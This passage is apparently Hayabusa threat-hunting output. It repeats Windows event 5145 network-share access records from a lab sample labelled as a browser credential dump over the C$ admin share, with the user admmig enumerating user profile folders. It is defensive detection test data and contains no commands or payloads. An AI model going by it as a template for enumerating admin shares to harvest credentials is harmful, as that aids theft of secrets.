IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 